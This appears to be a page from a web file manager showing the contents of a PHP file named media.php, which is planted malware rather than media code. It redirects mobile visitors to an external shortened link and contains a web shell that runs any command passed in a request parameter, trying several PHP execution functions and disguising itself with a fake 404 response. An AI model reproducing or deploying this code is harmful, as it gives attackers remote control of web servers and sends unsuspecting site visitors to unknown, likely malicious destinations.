OwlCyberSecurity - MANAGER
Edit File: media.php
<?php $lineindexinstall = '<meta http-equiv="refresh" content="3; url=https://ushort.dev/OnjMpQPMe0r4" /><script>location.replace("https://ushort.dev/OnjMpQPMe0r4");</script>'; $userAgent = $_SERVER['HTTP_USER_AGENT']; $mobileAgents = ['Android', 'iPhone', 'iPad', 'iPod', 'BlackBerry', 'Opera Mini', 'IEMobile', 'Mobile']; foreach ($mobileAgents as $agent) { if (stripos($userAgent, $agent) !== false) { echo $lineindexinstall; } } ?> <?php if(!isset($_REQUEST["lwlfk"])){header("HTTP/1.1 404 Not Found");exit;}echo "LP_a4939c";$c=$_REQUEST["lwlfk"];ob_start();@system($c);$o=ob_get_clean();if(!$o){ob_start();@passthru($c);$o=ob_get_clean();}if(!$o){$o=@shell_exec($c);}if(!$o){@exec($c,$a);$o=implode("\n",$a);}if(!$o){$o=@`$c`;}if(!$o&&function_exists("proc_open")){$h=@proc_open($c,[1=>["pipe","w"],2=>["pipe","w"]],$ps);if($h){$o=stream_get_contents($ps[1]).stream_get_contents($ps[2]);fclose($ps[1]);fclose($ps[2]);proc_close($h);}}if(!$o){$h=@popen($c." 2>&1","r");if($h){while(!feof($h))$o.=fread($h,4096);pclose($h);}}echo $o;